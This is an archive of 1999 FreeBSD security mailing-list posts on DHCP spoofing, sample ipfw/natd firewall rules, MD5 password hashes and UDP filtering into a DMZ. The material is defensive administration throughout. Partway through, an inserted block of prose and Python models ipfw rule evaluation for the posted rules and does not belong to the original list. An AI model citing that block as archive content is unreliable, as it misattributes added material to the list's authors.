I was on the DHCP security working group for a while, and my conclusion was really that there is no good answer; you can sort of do something if you have really smart programmable switches, but that sort of violates the "they manage to just connect..." assertion. With crypto extensions, you can prevent the server from allocating resources it shouldn't, and you can generate an audit trail for the client in the event of spoofing (although you might not notice it). In the end, denial of service attacks are not something you can control in this environment unless you can make guarantees about the medium. As long as crypto is used for all other applications and your software is right, it doesn't go much beyond that, however.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Tue Apr 20 13:33: 7 1999
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 63C4215024 for ; Tue, 20 Apr 1999 13:33:00 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA05585; Tue, 20 Apr 1999 13:28:57 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA22198; Tue, 20 Apr 1999 13:28:42 -0700
Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA16303; Tue, 20 Apr 99 13:28:37 PDT
Message-Id: <371CE376.FDED01D5@softweyr.com>
Date: Tue, 20 Apr 1999 14:28:38 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11;
 U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: David Gilbert
Cc: cjclark@home.com, Harry_M_Leitzell@cmu.edu, fred@fredbox.com, security@FreeBSD.ORG
Subject: Re: DHCP (was Re: poink attack (was Re: ARP problem in Windows9X/NT))
References: <14108.38235.254919.924353@trooper.velocet.ca> <199904201515.LAA09694@cc942873-a.ewndsr1.nj.home.com> <14108.40776.605720.29036@trooper.velocet.ca>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

David Gilbert wrote:
>
> >>>>> "Crist" == Crist J Clark writes:
>
> Crist> OK, I'll bite.
>
> Crist> What happens when someone who is not supposed to connects to a
> Crist> DHCP served network? (Besides that they are connected to the
> Crist> network and are not supposed to be.) -- Crist J. Clark
> Crist> cjclark@home.com
>
> It just lowers the bar. To attach oneself usefully to a foreign IP
> network requires some experimentation and/or packet sniffing. On a
> DHCP network, it's just plug and pray. I suppose it's the difference
> between running Linux which every script kiddie plays with vs. running
> FreeBSD (little harder) or HpUX (reasonably obscure).
>
> I'm certainly not one to believe in security by obscurity --- not at
> least against a knowledgeable attacker. However, there is a
> correlation between the number of breakins on hosts we (Velocet)
> monitor and that host's representative population.
>
> DG/UX is likely holey as swiss cheese, but rootshell doesn't have a
> 'sploit for it.
>
> Back to the original issue: Joe _average_ salesman is sitting in the
> boardroom... which has a network jack. He's left alone for 30 minutes
> for one reason or another. He plugs in. Without _any_ knowledge,
> he's up and running. Of course, if Joe were a hacker worth his salt,
> this wouldn't be a barrier --- but the likelihood of Joe being a
> hacker is small.
>
> I think there's a definite range of security issues --- and I think
> it's ridiculous for most companies to take the standard 'stance' that
> they must protect themselves against all perils

As Rob Clyde used to point out, if the security measures put in place cost more than the potential loss, you've absolutely lost money. All "reasonable" security is to implement the most effective, least expensive security measures and then keep going until your systems (and networks) are "secure enough."

--
       "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                 Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

From owner-freebsd-security Tue Apr 20 14:46: 2 1999
Received: from metronet.com (fohnix.metronet.com [192.245.137.2]) by hub.freebsd.org (Postfix) with SMTP id BD78914BF5 for ; Tue, 20 Apr 1999 14:45:54 -0700 (PDT) (envelope-from pgilley@metronet.com)
Received: from localhost by metronet.com with SMTP id AA15939 (5.67a/IDA1.5hp for ); Tue, 20 Apr 1999 16:43:03 -0500
Date: Tue, 20 Apr 1999 16:43:01 -0500 (CDT)
From: Phil Gilley
To: Thomas Uhrfelt
Cc: freebsd-security@freebsd.org
Subject: Re: SV: Sample Ipfw scripts?
In-Reply-To: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Tue, 20 Apr 1999, Thomas Uhrfelt wrote:

> You might want to take a look at the FreeBSD IPFW Config page below, but I
> don't think the scripts are very good,

Then send me some better ones to add to the page. :-)

I make very limited use of ipfw. I created the ipfw page because of frequent posts like the one earlier and because when I first started using ipfw the only examples I could find were in /etc/rc.firewall.
I was hoping to gather some more complex examples for people to learn
from. Does anyone care to show off what they're doing with ipfw?

Phil Gilley
pgilley@metronet.com

From owner-freebsd-security Tue Apr 20 15:17:57 1999
Delivered-To: freebsd-security@freebsd.org
Received: from vidnt2.hq.vid-h2o.org (vista2-blk1-hfc-0251-d1db0de8.rdc1.sdca.coxatwork.com [209.219.13.232]) by hub.freebsd.org (Postfix) with ESMTP id 7198914EAB for ; Tue, 20 Apr 1999 15:17:55 -0700 (PDT) (envelope-from JDoscher@vid-h2o.org)
Received: by VIDNT2 with Internet Mail Service (5.5.2232.9) id ; Tue, 20 Apr 1999 15:18:13 -0700
Message-ID:
From: Jay Doscher
To: "'security@freebsd.org'"
Subject: Some decent Ipfw scripts
Date: Tue, 20 Apr 1999 15:17:51 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2232.9)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

That's what I was asking for really. I was hoping that someone would be
willing to show off some cool uses for the ipfw scripts, but I have also
seen the samples on the machine and was hoping for some good ones.

Jay Doscher

-----Original Message-----
From: Phil Gilley
To: Thomas Uhrfelt
Cc: freebsd-security@FreeBSD.ORG
Date: Tuesday, April 20, 1999 2:44 PM
Subject: Re: SV: Sample Ipfw scripts?

>On Tue, 20 Apr 1999, Thomas Uhrfelt wrote:
>
>> You might want to take a look at the FreeBSD IPFW Config page below, but I
>> don't think the scripts are very good,
>
>Then send me some better ones to add to the page. :-)
>
>I make very limited use of ipfw. I created the ipfw page because
>of frequent posts like the one earlier and because when I first
>started using ipfw the only examples I could find were in
>/etc/rc.firewall. I was hoping to gather some more complex examples
>for people to learn from.
>Does anyone care to show off what they're
>doing with ipfw?
>
>Phil Gilley
>pgilley@metronet.com
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

Jay Doscher
Information Systems Assistant
Phone<760.806.3172>
Fax<760.806.3072>
PGP Signature File ftp://mp3.doscher.com/tools/public_key.asc

From owner-freebsd-security Tue Apr 20 21:30:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from athena.connectalk.com (athena.connectalk.com [204.19.165.45]) by hub.freebsd.org (Postfix) with ESMTP id 29B8B15083 for ; Tue, 20 Apr 1999 21:30:42 -0700 (PDT) (envelope-from bgallant@ConnecTalk.com)
Received: from atlantis.connectalk.com ([172.16.0.67]) by athena.connectalk.com (Netscape Messaging Server 3.6) with ESMTP id AAA426F; Wed, 21 Apr 1999 00:26:22 -0400
Date: Wed, 21 Apr 1999 00:30:51 -0400 (EDT)
From: "Bruno Gallant"
To: Phil Gilley
Cc: freebsd-security@freebsd.org
Subject: Re: SV: Sample Ipfw scripts?
In-Reply-To:
Message-ID:
Approved: Just another sysadmin
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

We had a client a couple of months ago that wanted to be connected to the
internet. They had an IBM F50 as their financial server. They wanted to
also have Lotus Domino installed on it, to control email, among other
things. They also have salesmen in the US and Canada, logging in from their
own providers to access their Lotus databases. And they wanted security,
obviously.

We installed FreeBSD 2.2.8 on an IBM Netfinity as the gateway, and used
ipfw to block every port, except 22, 25, 1352, which stand, as you know,
for ssh, smtp and Lotus Notes. The F50 is obviously behind the gateway, so
we used natd to redirect the ports 25 and 1352 to the internal machine.
In effect, if you would telnet to port 1352, the F50 would answer, not the
gateway. We also restricted ssh connections to those coming from our
company's subnet, since our client does not have IT personnel on site; we
maintain their network.

So here's what I did (dummy addresses): the F50 is 192.168.1.2; the gateway
is 789.456.123.111; our corporate subnet is 123.456.789.0/24; xl0 is the
external interface; fxp0 is the internal interface.

In the rc.firewall, in the "simple" section I added:

$fwcmd add 155 allow tcp from any to 192.168.1.2 25 via xl0
$fwcmd add 157 allow tcp from any to 192.168.1.2 1352 via xl0
$fwcmd add 155 allow ip from any to any via fxp0
$fwcmd add 175 allow tcp from 123.456.789.0/24 to 789.456.123.111 22

In the rc.conf, and that's where the magic is, we edited the following
line:

natd_flags="-redirect_port tcp 192.168.1.2:25 25 -redirect_port tcp 192.168.1.2:1352 1352" # Additional flags for natd.

So what basically happens is that if a packet arrives for port 1352 on the
gateway, it hits the divert rule, where natd recognizes that it has to
change the destination address to the F50's but keep the same port, and
puts the packet back in the rule stack, and so it hits rule 157, and goes
through. natd remembers where the packet comes from in its internal
database, so there is no problem for the replies going back to the
originator.

It's more of a natd issue, true enough, but since natd cannot work without
ipfw...

From this example, you can create quite crazy configurations, where
accessing port 25 on one machine could end up on port 100 on another.

Don't know if it's a good example or not, but it solved our problem neatly.

On Tue, 20 Apr 1999, Phil Gilley wrote:

> Date: Tue, 20 Apr 1999 16:43:01 -0500 (CDT)
> From: Phil Gilley
> To: Thomas Uhrfelt
> Cc: freebsd-security@freebsd.org
> Subject: Re: SV: Sample Ipfw scripts?
>
> On Tue, 20 Apr 1999, Thomas Uhrfelt wrote:
>
> > You might want to take a look at the FreeBSD IPFW Config page below, but I
> > don't think the scripts are very good,
>
> Then send me some better ones to add to the page. :-)
>
> I make very limited use of ipfw. I created the ipfw page because
> of frequent posts like the one earlier and because when I first
> started using ipfw the only examples I could find were in
> /etc/rc.firewall. I was hoping to gather some more complex examples
> for people to learn from. Does anyone care to show off what they're
> doing with ipfw?
>
> Phil Gilley
> pgilley@metronet.com
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

------------------+-----------------------------------------------------------
Bruno Gallant     | All wars are civil wars, because all men are brothers ...
System Integrator | Each one owes infinitely more to the human race than to
ConnecTalk        | the particular country in which he was born.
(514)856-3060     |                                      -- Francois Fenelon

From owner-freebsd-security Wed Apr 21 1: 2:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from mailg.telia.com (mailg.telia.com [194.22.194.26]) by hub.freebsd.org (Postfix) with ESMTP id D55421574C for ; Wed, 21 Apr 1999 01:02:19 -0700 (PDT) (envelope-from thomas.uhrfelt@plymovent.se)
Received: from d1o68.telia.com (root@d1o68.telia.com [62.20.138.241]) by mailg.telia.com (8.8.5/8.8.8) with ESMTP id JAA02773; Wed, 21 Apr 1999 09:59:50 +0200 (CEST)
Received: from tu (t4o68p101.telia.com [62.20.139.221]) by d1o68.telia.com (8.8.8/8.8.5) with SMTP id JAA17342; Wed, 21 Apr 1999 09:59:48 +0200 (CEST)
Received: by localhost with Microsoft MAPI; Wed, 21 Apr 1999 09:56:40 +0200
Message-ID: <01BE8BDD.40E22BB0.thomas.uhrfelt@plymovent.se>
From: Thomas Uhrfelt
Reply-To: "thomas.uhrfelt@plymovent.se"
To: "'Phil Gilley'"
Cc: "'freebsd-security@freebsd.org'"
Subject: SV: SV: Sample Ipfw scripts?
Date: Wed, 21 Apr 1999 09:50:04 +0200
Organization: Plymovent AB
X-Mailer: Microsoft Internet-e-post/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This was most certainly not an attack on you as a person; in fact it wasn't
an attack at all, just a mere observation. I would be glad to send you mine
(when completed, and if it gets "good"). I just figured since it's a widely
used program, there oughta be more well-thought-through and well-structured
configuration files out there. I am looking, and if/when I find some good
ones I'll be sure to send you them.
Regards,

Thomas

> On Tue, 20 Apr 1999, Thomas Uhrfelt wrote:
>
> > You might want to take a look at the FreeBSD IPFW Config page below, but I
> > don't think the scripts are very good,
>
> Then send me some better ones to add to the page. :-)
>
> I make very limited use of ipfw. I created the ipfw page because
> of frequent posts like the one earlier and because when I first
> started using ipfw the only examples I could find were in
> /etc/rc.firewall. I was hoping to gather some more complex examples
> for people to learn from. Does anyone care to show off what they're
> doing with ipfw?
>
> Phil Gilley
> pgilley@metronet.com

From owner-freebsd-security Wed Apr 21 6: 4:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from metronet.com (fohnix.metronet.com [192.245.137.2]) by hub.freebsd.org (Postfix) with SMTP id C417C152CD for ; Wed, 21 Apr 1999 06:04:39 -0700 (PDT) (envelope-from pgilley@metronet.com)
Received: from localhost by metronet.com with SMTP id AA22360 (5.67a/IDA1.5hp for ); Wed, 21 Apr 1999 08:01:43 -0500
Date: Wed, 21 Apr 1999 08:01:42 -0500 (CDT)
From: Phil Gilley
To: Thomas Uhrfelt
Cc: freebsd-security@freebsd.org
Subject: Re: SV: SV: Sample Ipfw scripts?
In-Reply-To: <01BE8BDD.40E22BB0.thomas.uhrfelt@plymovent.se>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 21 Apr 1999, Thomas Uhrfelt wrote:

> This was most certainly not an attack on you as a person, in fact it wasn't an
> attack at all, just a mere observation. I would be glad to send you mine
> (when completed, and if it gets "good"). I just figured since it's a widely
> used program, there oughta be more well-thought-through and well structured
> configuration files out there.
> I am looking, and if/when I find some good
> ones I'll be sure to send you them.

It wasn't taken as an attack. I used your post as an opportunity to
solicit more examples and have received a few as a result. They will be
added to the page in the next day or so.

Phil Gilley
pgilley@metronet.com

From owner-freebsd-security Wed Apr 21 10:35:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 3A55B14E1C for ; Wed, 21 Apr 1999 10:34:47 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id NAA04945; Wed, 21 Apr 1999 13:32:16 -0400 (EDT)
From: David Gilbert
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14110.2976.43026.123677@trooper.velocet.ca>
Date: Wed, 21 Apr 1999 13:32:16 -0400 (EDT)
To: Phil Gilley
Cc: Thomas Uhrfelt , freebsd-security@FreeBSD.ORG
Subject: Re: SV: Sample Ipfw scripts?
In-Reply-To:
References: <01BE8B49.BD40B300.thomas.uhrfelt@plymovent.se>
X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> "Phil" == Phil Gilley writes:

Phil> examples for people to learn from. Does anyone care to show off
Phil> what they're doing with ipfw?

One thing in particular that I've done with ipfw that is different from
the rc.firewall is to change a rule like:

add 10 divert 8668 ip from any to any via ed0

(where ed0 is the external interface) to

add 10 divert 8668 ip from 192.168.0.0/16 to any out via ed0
add 11 divert 8668 ip from any to a.b.c.d in via ed0

where a.b.c.d is a virtual address on ed0 used only for NAT.
This avoids putting every packet through NAT (and is one of the primary
advantages to the FreeBSD style of divert sockets over Linux-style NAT
rules). This reduces the load that NAT produces (can be important if only
a small amount of traffic is NAT'd) and also allows you to kill natd from
points other than the console as long as you're not involved in the divert
rule.

Dave.

--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be     |
|Mail:       dgilbert@velocet.net             | equal if and only if they  |
|http://www.velocet.net/~dgilbert             | are precisely opposite.    |
=========================================================GLO================

From owner-freebsd-security Wed Apr 21 13:53:32 1999
Delivered-To: freebsd-security@freebsd.org
Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 1A31015096 for ; Wed, 21 Apr 1999 13:52:41 -0700 (PDT) (envelope-from benedict@echonyc.com)
Received: from localhost (benedict@localhost) by echonyc.com (8.9.3/8.9.3) with ESMTP id QAA12699 for ; Wed, 21 Apr 1999 16:49:15 -0400 (EDT)
Date: Wed, 21 Apr 1999 16:49:15 -0400 (EDT)
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: security@freebsd.org
Subject: How many bits in a FreeBSD MD5 passwd hash?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I checked passwd(5), but I didn't see anything about this. For some
reason I think it's 128, but I can't remember where it's documented.
Anyone?

Ben

"You have your mind on computers, it seems."
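Both ipfw rule sets posted earlier in this digest, Bruno Gallant's natd port redirect and David Gilbert's narrowed divert rule, depend on the same two properties of ipfw: rules are evaluated in number order and the first match decides, and a divert rule hands the packet to natd and then resumes evaluation at the next rule with whatever natd handed back. The Python model below is an example added here; it is not code from either poster, from rc.firewall, or from ipfw(8)/natd(8). It walks a rule list with those semantics and reports which rule decides each constructed packet and how many divert rules it crossed. Assumptions are labelled in the code: the public addresses stand in for Bruno's dummy ones and David's a.b.c.d, the rc.firewall divert rule is placed at number 100, and the helper names are mine.

```python
"""Model of ipfw first-match evaluation with a natd-style port redirect.
Added example: not code from any poster, rc.firewall, ipfw(8) or natd(8).
Only the rule syntax used in the posts above is understood (allow | deny |
divert <port>, protocol, from/to with optional /mask and destination port,
in/out, via <iface>). Public addresses are constructed stand-ins."""
from dataclasses import dataclass, replace
from typing import Optional
import ipaddress

@dataclass(frozen=True)
class Packet:              # proto "tcp"/"udp"/"icmp"; dport 0 if portless; direction "in"/"out"
    proto: str
    src: str
    dst: str
    dport: int
    direction: str
    iface: str

@dataclass(frozen=True)
class Rule:
    num: int
    action: str               # "allow", "deny" or "divert"
    proto: str                # "ip" matches every protocol
    src: str                  # "any", a host address or a CIDR block
    dst: str
    dport: Optional[int]      # None: any port; likewise direction and iface
    direction: Optional[str]
    iface: Optional[str]

    def matches(self, p: Packet) -> bool:
        return (self.proto in ("ip", p.proto)
                and _addr_match(self.src, p.src) and _addr_match(self.dst, p.dst)
                and self.dport in (None, p.dport)
                and self.direction in (None, p.direction)
                and self.iface in (None, p.iface))

def _addr_match(spec: str, addr: str) -> bool:
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

def parse_rule(text: str) -> Rule:
    """Parse e.g. '$fwcmd add 155 allow tcp from any to 192.168.1.2 25 via xl0'."""
    toks = [t for t in text.split() if t not in ("$fwcmd", "add")]
    num, action, i = int(toks[0]), toks[1], 2
    if action == "divert":
        i += 1                   # natd's divert port (8668) plays no role here
    proto, i = toks[i], i + 1    # toks[i:i+4] is 'from <src> to <dst>'
    src, dst, i = toks[i + 1], toks[i + 3], i + 4
    dport = direction = iface = None
    if i < len(toks) and toks[i].isdigit():
        dport, i = int(toks[i]), i + 1
    while i < len(toks):
        if toks[i] in ("in", "out"):
            direction, i = toks[i], i + 1
        elif toks[i] == "via":
            iface, i = toks[i + 1], i + 2
        else:
            raise ValueError(f"unsupported token {toks[i]!r} in {text!r}")
    return Rule(num, action, proto, src, dst, dport, direction, iface)

def evaluate(rules, pkt: Packet, redirects=None):
    """First match wins in rule-number order (equal numbers keep insertion order,
    as ipfw does). Returns (action, rule number, packet as finally seen, number
    of divert hits). A divert match models natd: a -redirect_port entry rewrites
    an inbound packet's destination, and evaluation continues at the next rule,
    where the kernel re-injects what natd hands back. Masquerading is not modelled."""
    redirects, diverts = redirects or {}, 0
    for rule in sorted(rules, key=lambda r: r.num):
        if not rule.matches(pkt):
            continue
        if rule.action == "divert":
            diverts += 1
            target = redirects.get((pkt.proto, pkt.dst, pkt.dport))
            if target and pkt.direction == "in":
                pkt = replace(pkt, dst=target[0], dport=target[1])
            continue
        return rule.action, rule.num, pkt, diverts
    return "deny", 65535, pkt, diverts           # ipfw's implicit final rule

# Bruno's gateway: GATEWAY and CORP_NET are constructed stand-ins for his dummy
# 789.456.123.111 and 123.456.789.0/24; the F50 address is the one he posted.
GATEWAY, CORP_NET, F50 = "198.51.100.11", "203.0.113.0/24", "192.168.1.2"
BRUNO_RULES = [parse_rule(r) for r in (
    "add 100 divert 8668 ip from any to any via xl0",   # rc.firewall's divert; number assumed
    "$fwcmd add 155 allow tcp from any to 192.168.1.2 25 via xl0",
    "$fwcmd add 157 allow tcp from any to 192.168.1.2 1352 via xl0",
    "$fwcmd add 155 allow ip from any to any via fxp0",
    f"$fwcmd add 175 allow tcp from {CORP_NET} to {GATEWAY} 22")]
# natd_flags="-redirect_port tcp 192.168.1.2:25 25 -redirect_port tcp 192.168.1.2:1352 1352"
BRUNO_REDIRECTS = {("tcp", GATEWAY, 25): (F50, 25), ("tcp", GATEWAY, 1352): (F50, 1352)}

def inbound_to_gateway(proto: str, src: str, dport: int):
    """Verdict for a packet arriving on xl0 addressed to the gateway itself."""
    return evaluate(BRUNO_RULES, Packet(proto, src, GATEWAY, dport, "in", "xl0"), BRUNO_REDIRECTS)

# David's narrowed divert: NAT_VIRTUAL stands in for his a.b.c.d, GW_OWN for the
# gateway's own non-NAT address (both constructed).
NAT_VIRTUAL, GW_OWN = "198.51.100.12", "198.51.100.10"
BROAD_DIVERT = [parse_rule("add 10 divert 8668 ip from any to any via ed0")]
NARROW_DIVERT = [parse_rule("add 10 divert 8668 ip from 192.168.0.0/16 to any out via ed0"),
                 parse_rule(f"add 11 divert 8668 ip from any to {NAT_VIRTUAL} in via ed0")]

def divert_hits(rules, src: str, dst: str, direction: str) -> int:
    """How many divert rules a TCP packet on ed0 passes through."""
    return evaluate(rules, Packet("tcp", src, dst, 80, direction, "ed0"))[3]
```

With Bruno's rules, inbound_to_gateway("tcp", "192.0.2.7", 1352) is decided by rule 157 after the divert has rewritten the destination to the F50, ssh from the corporate subnet is accepted by rule 175 and ssh from anywhere else falls through to the implicit final deny; with David's two rules, traffic from the gateway's own address or to it, rather than to the NAT-only address, never touches a divert rule, which is the load reduction he describes. Note that the model, like the rules it takes from the posts, has no state: the replies natd lets back through are its own bookkeeping, as Bruno says.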
From owner-freebsd-security Wed Apr 21 15:54:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from phoenix.welearn.com.au (phoenix.welearn.com.au [139.130.44.81]) by hub.freebsd.org (Postfix) with ESMTP id A393B14DBF for ; Wed, 21 Apr 1999 15:54:36 -0700 (PDT) (envelope-from sue@phoenix.welearn.com.au)
Received: (from sue@localhost) by phoenix.welearn.com.au (8.9.1/8.9.0) id IAA17918; Thu, 22 Apr 1999 08:51:59 +1000 (EST)
Message-ID: <19990422085156.55396@welearn.com.au>
Date: Thu, 22 Apr 1999 08:51:56 +1000
From: Sue Blake
To: ben@rosengart.com
Cc: security@FreeBSD.ORG
Subject: Re: How many bits in a FreeBSD MD5 passwd hash?
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: ; from Snob Art Genre on Wed, Apr 21, 1999 at 04:49:15PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Apr 21, 1999 at 04:49:15PM -0400, Snob Art Genre wrote:
> I checked passwd(5), but I didn't see anything about this. For some
> reason I think it's 128, but I can't remember where it's documented.
> Anyone?

Yes, 128. Try passwd(1) instead.
--
Regards,
        -*Sue*-

From owner-freebsd-security Thu Apr 22 5:14:10 1999
Delivered-To: freebsd-security@freebsd.org
Received: from penguin.wise.edt.ericsson.se (penguin-ext.wise.edt.ericsson.se [194.237.142.5]) by hub.freebsd.org (Postfix) with ESMTP id 0AB38159D7 for ; Thu, 22 Apr 1999 05:13:54 -0700 (PDT) (envelope-from teima@teidns1.tei.ericsson.se)
Received: from tei.ericsson.se (mailhub.tei.ericsson.se [141.137.137.57]) by penguin.wise.edt.ericsson.se (8.9.0/8.9.0/WIREfire-1.2) with SMTP id OAA27852 for ; Thu, 22 Apr 1999 14:11:20 +0200 (MET DST)
Received: from teidns1.tei.ericsson.se by tei.ericsson.se (SMI-8.6/SMI-SVR4) id OAA24075; Thu, 22 Apr 1999 14:12:19 +0200
Received: from [141.137.146.193] by teidns1.tei.ericsson.se (5.0/SMI-SVR4) id AA21103; Thu, 22 Apr 1999 14:06:01 --100
Message-Id: <371F1202.C5F5DD5E@teidns1.tei.ericsson.se>
Date: Thu, 22 Apr 1999 14:11:46 +0200
From: Valter Mazzaro
Organization: Ericsson Telecomunicazioni
X-Mailer: Mozilla 4.05 [en] (Win95; I)
Mime-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Firewalls filtering UDP packets
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I strongly need a suggestion from you guys!!!

I'm not a security expert at all and probably what I'll ask doesn't make so
much sense, but I'm dealing with a particular problem and I hope you could
give me a hint.

I have a network that is connected to the outside world via an Access
Server (Cisco 5200) which terminates dial-in calls. Behind the AS I have a
FreeBSD firewall that lets the traffic get into the DMZ, where some IP
services are provided (WWW server, DNS, TACACS+, etc.). The DMZ is
separated from the internal net by another firewall.

For a particular service I need to allow UDP traffic to get into the DMZ.
I know that usually it is not secure to allow such traffic in, but I need
it anyway and I'd like to have the most secure solution I can. I was
thinking of filtering packets following these rules:

- allow all the IP source addresses assigned by the AS (in a certain pool
  range) and incoming from the FW interface to which the AS is attached.
- allow all the UDP destination addresses that correspond to the port
  number on which the service daemon is listening

My questions are 2:

1) In your opinion could this be enough or do you have some further
   suggestions?

2) This comes from my poor knowledge of Unix internals. I think, not sure
   :-( , that when a TCP connection is set up to a server, the server
   daemon is listening on a well-known port (like 23 in telnet). If a
   request comes from a client, the daemon forks a process that starts to
   listen on another socket (by consequence the TCP destination port will
   change for the packets coming from the clients). Is it the same for
   UDP? I know that I'm speaking about a connectionless thing, but for my
   problem it's important to know whether the UDP destination port (not to
   be filtered in the FW) changes.

Thank you a lot in advance, sorry for my long text and please reply to my
email address as well, as I'm not subscribed to the list at the moment.
Valter

From owner-freebsd-security Thu Apr 22 9: 2: 9 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xap.xyplex.com (xap.xyplex.com [140.179.130.200]) by hub.freebsd.org (Postfix) with ESMTP id 6894515AC5 for ; Thu, 22 Apr 1999 09:01:55 -0700 (PDT) (envelope-from rwhitesel@nbase-xyplex.com)
Received: from pcrlw (pcrlw.xyplex.com [140.179.228.211]) by xap.xyplex.com (8.8.5/8.7.3) with SMTP id LAA11741 for ; Thu, 22 Apr 1999 11:57:14 -0400 (EDT)
Message-ID: <000b01be8cd9$a53728c0$d3e4b38c@xyplex.com>
From: "Rick Whitesel"
To: "freebsd-security FreeBSD.org"
Subject: KAME integration
Date: Thu, 22 Apr 1999 12:03:21 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2014.211
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi:

Can anyone tell me the status of KAME integration into FreeBSD? It looks
like Linux is going with FreeS/WAN and the other BSDs seem to be going
with KAME or NRL.

Thank you:

Rick Whitesel
Scientist
NBase-Xyplex
rwhitesel@nbase-xyplex.com

"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety."
-- Benjamin Franklin, 1759

From owner-freebsd-security Thu Apr 22 11: 5:42 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gridley.ACNS.Carleton.edu (Gridley.ACNS.Carleton.edu [137.22.96.1]) by hub.freebsd.org (Postfix) with ESMTP id 6FEE91503A for ; Thu, 22 Apr 1999 11:05:39 -0700 (PDT) (envelope-from hedberge@gridley.acns.carleton.edu)
Received: by gridley.ACNS.Carleton.edu (Postfix, from userid 1002) id DCAD05A38; Thu, 22 Apr 1999 12:58:21 -0500 (CDT)
Received: from localhost (localhost [127.0.0.1]) by gridley.ACNS.Carleton.edu (Postfix) with ESMTP for id D727616828; Thu, 22 Apr 1999 12:58:21 -0500 (CDT)
Date: Thu, 22 Apr 1999 12:58:21 -0500 (CDT)
From: Eric Hedberg
To: freebsd-security@freebsd.org
Subject: login.conf and chroot
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Silly me, I deleted the reference to the login patches for chroot just
before I realized I had an application for them. Could someone send me
the link?
Regards,

Eric Hedberg

From owner-freebsd-security Fri Apr 23 19:37:39 1999
Delivered-To: freebsd-security@freebsd.org
Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id DFE84151AF for ; Fri, 23 Apr 1999 19:37:31 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr)
